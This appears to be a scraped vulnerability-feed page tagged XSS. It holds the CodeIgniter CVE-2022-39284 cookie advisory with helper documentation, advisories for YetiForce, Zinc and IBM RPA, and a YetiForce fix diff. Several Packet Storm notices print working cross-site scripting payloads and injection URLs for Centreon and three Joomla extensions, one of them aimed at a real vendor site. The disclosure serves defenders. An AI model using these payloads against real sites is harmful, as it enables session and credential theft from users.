CodeIgniter is a PHP full-stack web framework. In versions prior to 4.2.7 setting `$secure` or `$httponly` value to `true` in `Config\Cookie` is not reflected in `set_cookie()` or `Response::setCookie()`. As a result cookie values are erroneously exposed to scripts. It should be noted that this vulnerability does not affect session cookies. Users are advised to upgrade to v4.2.7 or later. Users unable to upgrade are advised to manually construct their cookies either by setting the options in code or by constructing Cookie objects. Examples of each workaround are available in the linked GHSA.

CodeIgniter

The Cookie Helper file contains functions that assist in working with cookies.

*   Loading this Helper
*   Available Functions

**Loading this Helper**

This helper is loaded using the following code:

**Available Functions**

The following functions are available:

set_cookie(_$name_\[, _$value = ''_\[, _$expire = ''_\[, _$domain = ''_\[, _$path = '/'_\[, _$prefix = ''_\[, _$secure = false_\[, _$httpOnly = false_\[, _$sameSite = ''_\]\]\]\]\]\]\]\])

 

Parameters:

*   **$name** (_mixed_) – Cookie name _or_ associative array of all of the parameters available to this function
*   **$value** (_string_) – Cookie value
*   **$expire** (_int_) – Number of seconds until expiration
*   **$domain** (_string_) – Cookie domain (usually: .yourdomain.com)
*   **$path** (_string_) – Cookie path
*   **$prefix** (_string_) – Cookie name prefix. If '', the default from **app/Config/Cookie.php** is used
*   **$secure** (_bool_) – Whether to only send the cookie through HTTPS. If null, the default from **app/Config/Cookie.php** is used
*   **$httpOnly** (_bool_) – Whether to hide the cookie from JavaScript. If null, the default from **app/Config/Cookie.php** is used
*   **$sameSite** (_string_) – The value for the SameSite cookie parameter. If null, the default from **app/Config/Cookie.php** is used

Return type:

void

Note

Prior to v4.2.7, the default values of $secure and $httpOnly were false due to a bug, and these values from **app/Config/Cookie.php** were never used.

This helper function gives you friendlier syntax to set browser cookies. Refer to the Response Library for a description of its use, as this function is an alias for CodeIgniter\HTTP\Response::setCookie().

get_cookie(_$index_\[, _$xssClean = false_\[, _$prefix = ''_\]\])

 

Parameters:

*   **$index** (_string_) – Cookie name
*   **$xssClean** (_bool_) – Whether to apply XSS filtering to the returned value
*   **$prefix** (_string|null_) – Cookie name prefix. If set to '', the default value from **app/Config/Cookie.php** will be used. If set to null, no prefix

Returns:

The cookie value or null if not found

Return type:

mixed

Note

Since v4.2.1, the third parameter $prefix has been introduced and the behavior has been changed a bit due to a bug fix. See Upgrading for details.

This helper function gives you friendlier syntax to get browser cookies. Refer to the IncomingRequest Library for detailed description of its use, as this function acts very similarly to IncomingRequest::getCookie(), except it will also prepend the Config\Cookie::$prefix that you might’ve set in your **app/Config/Cookie.php** file.

Warning

Using XSS filtering is a bad practice. It does not prevent XSS attacks perfectly. Using esc() with the correct $context in the views is recommended.

delete_cookie(_$name_\[, _$domain = ''_\[, _$path = '/'_\[, _$prefix = ''_\]\]\])

 

Parameters:

*   **$name** (_string_) – Cookie name
*   **$domain** (_string_) – Cookie domain (usually: .yourdomain.com)
*   **$path** (_string_) – Cookie path
*   **$prefix** (_string_) – Cookie name prefix

Return type:

void

Lets you delete a cookie. Unless you’ve set a custom path or other values, only the name of the cookie is needed.

<?php

delete\_cookie('name');

This function is otherwise identical to set_cookie(), except that it does not have the value and expire parameters.

Note

When you use set_cookie(), if the value is set to empty string and the expire is set to 0, the cookie will be deleted. If the value is set to non-empty string and the expire is set to 0, the cookie will only last as long as the browser is open.

You can submit an array of values in the first parameter or you can set discrete parameters.

<?php

delete\_cookie($name, $domain, $path, $prefix);

has_cookie(_string $name_\[, _?string $value = null_\[, _string $prefix = ''_\]\])

 

Parameters:

*   **$name** (_string_) – Cookie name
*   **$value** (_string|null_) – Cookie value
*   **$prefix** (_string_) – Cookie prefix

Return type:

bool

Checks if a cookie exists by name. This is an alias of Response::hasCookie().

CVE-2022-39284: Cookie Helper — CodeIgniter 4.2.7 documentation

YetiForce CRM version 6.4.0 and prior is vulnerable to stored cross-site scripting. A [patch](https://github.com/yetiforcecompany/yetiforcecrm/commit/54728becfdad9b6e686bbe336007cba2ce518248) is available on the `developer` branch.

**YetiForce CRM vulnerable to stored Cross-site Scripting**

Moderate severity GitHub Reviewed Published Oct 6, 2022 • Updated Oct 6, 2022

GHSA-v9fj-h8g6-4w9q: YetiForce CRM vulnerable to stored Cross-site Scripting

In Zinc, versions v0.1.9 through v0.3.1 are vulnerable to Stored Cross-Site Scripting when using the delete user functionality. When an authenticated user deletes a user having a XSS payload in the user id field, the javascript payload will be executed and allow an attacker to access the user’s credentials.

**Date: September 27, 2022**

In Zinc, versions v0.1.9 through v0.3.1 are vulnerable to Stored Cross-Site Scripting when using the delete user functionality. When an authenticated user deletes a user having a XSS payload in the user id field, the javascript payload will be executed and allow an attacker to access the user’s credentials.

**Language: Go**

CVE-2022-32171: Mend Vulnerability Database

In Zinc, versions v0.1.9 through v0.3.1 are vulnerable to Stored Cross-Site Scripting when using the delete template functionality. When an authenticated user deletes a template with a XSS payload in the name field, the Javascript payload will be executed and allow an attacker to access the user’s credentials.

**Date: September 27, 2022**

In Zinc, versions v0.1.9 through v0.3.1 are vulnerable to Stored Cross-Site Scripting when using the delete template functionality. When an authenticated user deletes a template with a XSS payload in the name field, the Javascript payload will be executed and allow an attacker to access the user’s credentials.

**Language: Go**

CVE-2022-32172: Mend Vulnerability Database

Cross-site Scripting (XSS) - Stored in GitHub repository yetiforcecompany/yetiforcecrm prior to 6.4.0.

@@ -19,7 +19,7 @@ <div class\="card"\> <div class\="card-header"\> {if !empty($RECORD\_MODEL\->getId())} <span class\="yfi yfi-full-editing-view mr-2"\></span\>{\\App\\Language::translate('LBL\_EDIT\_BUSINESS\_HOURS',$QUALIFIED\_MODULE)} - {$RECORD\_MODEL\->getName()} <span class\="yfi yfi-full-editing-view mr-2"\></span\>{\\App\\Language::translate('LBL\_EDIT\_BUSINESS\_HOURS',$QUALIFIED\_MODULE)} - {\\App\\Purifier::encodeHtml($RECORD\_MODEL\->getName())} {else} <span class\="fas fa-plus mr-2"\></span\>{\\App\\Language::translate('LBL\_ADD\_BUSINESS\_HOURS',$QUALIFIED\_MODULE)} {/if} @@ -29,8 +29,7 @@ <div class\="col-12 form-group row"\> <label class\="col-5"\><span class\="redColor"\>\*</span\>{\\App\\Language::translate('LBL\_NAME', $QUALIFIED\_MODULE)}</label\> <div class\="col-7"\> <input type\="text" name\="name" class\="form-control w-100" {if isset($RECORD\_MODEL)} value\="{$RECORD\_MODEL\->getName()}" {/if} data-validation-engine\="validate\[required,funcCall\[Vtiger\_Base\_Validator\_Js.invokeValidation\]\]"\> <input type\="text" name\="name" class\="form-control w-100" {if isset($RECORD\_MODEL)}value\="{\\App\\Purifier::encodeHtml($RECORD\_MODEL\->getName())}" {/if} data-validation-engine\="validate\[required,funcCall\[Vtiger\_Base\_Validator\_Js.invokeValidation\]\]"\> </div\> </div\> <div class\="col-12 form-group row"\>

CVE-2022-3002: Improved display of data in the business hours · YetiForceCompany/YetiForceCRM@54728be

A cross-site scripting (XSS) vulnerability in Centreon 22.04.0 allows attackers to execute arbitrary web script or HTML via a crafted payload injected into the Service>Templates service_alias parameter.

    # Exploit Title: Stored XSS in service_alias parameter in Centreon version 22.04.0# Date: 1/10/2022# Exploit Author: syad# Vendor Homepage: Centreon# Software Link: https://download.centreon.com/# Version: 22.04.0# CVE ID : CVE-2022-39988# Tested on: Centos 7Centreon 22.04.0 is vulnerable to Stored Cross Site Scripting (XSS) from the function Service -> Templates -> by adding a crafted payloadinto the service_alias parameter.go to this endpoint -> /centreon/main.get.php?p=60206 -> Service -> Templates -> Click Button "Add" and put the crafted payload below on section "Alias" and savepayload --> test"><body onload=prompt('XSS-STORED')>

CVE-2022-39988: Centreon 22.04.0 Cross Site Scripting ≈ Packet Storm

IBM Robotic Process Automation 21.0.1, 21.0.2, and 21.0.3 for Cloud Pak is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 234291.

CVE-2022-38709: IBM Robotic Process Automation cross-site scripting CVE-2022-38709 Vulnerability Report

Joomla KSAdvertiser extension version 2.5.37 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Heiner Klostermann - kiss-software.de                                      ││  Software : Joomla KSAdvertiser 2.5.37                                                 ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET parameter 'fSpS' is vulnerable to XSShttps://www.kiss-software.de/index.php?option=com_ksadvertiser&view=items&Itemid=0&filtercat=50&fSpS=KGNjLmlkID0gNTAgT1IgY2MucGFyZW50X2lkID0gNTApfChhLml0X2lkZW50PScxJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUxJScpfChhLnRpdGxlPScyJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUyJScpfChhLml0X2ludHJvPSczJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUzJScpfCgoYS5pdF9hZGRyZXNzPSc0JyBPUiBhLml0X3Bob25ldGljIExJS0UgJyU0JScpIEFORCBhLml0X2JveG51bWJlciA9IDApfCgoYS5pdF9wb3N0Y29kZT0nNScgT1IgYS5pdF9waG9uZXRpYyBMSUtFICclNSUnKSBBTkQgYS5pdF9ib3hudW1iZXIgPSAwKXwoKGEuaXRfY2l0eT0nNicgT1IgYS5pdF9waG9uZXRpYyBMSUtFICclNiUnKSBBTkQgYS5pdF9ib3hudW1iZXIgPSAwKWg1bjZsPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmlyYzdu&lang=en[-] Done

Joomla KSAdvertiser 2.5.37 Cross Site Scripting

Joomla JoomBri Careers extension version 3.3.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Joomla JoomBri Careers 3.3.0                                               ││  Software : JoomBri Team                                                               ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /for-jobseekers/search-jobsGET parameter 'keyword' is vulnerable to XSShttps://target.com/for-jobseekers/search-jobs?keyword=l9x1q%22onfocus%3d%22alert(1)%22autofocus%3d%22ak5aghi5u9p&location_id=2&jobtype_id=1&industry_id%5B%5D=2&functional_id%5B%5D=2&education_id%5B%5D=2&limit=20&option=com_career&task=[-] Done

Joomla JoomBri Careers 3.3.0 Cross Site Scripting

Joomla JoomBri Freelance extension version 4.5.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Joomla JoomBri Freelance 4.5.0                                             ││  Software : JoomBri Team                                                               ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET parameter 'keyword' is vulnerable to XSShttps://target.com/index.php?keyword=xfz9b%22onfocus%3d%22alert(1)%22autofocus%3d%22nyn0r[-] Done

Tag

#xss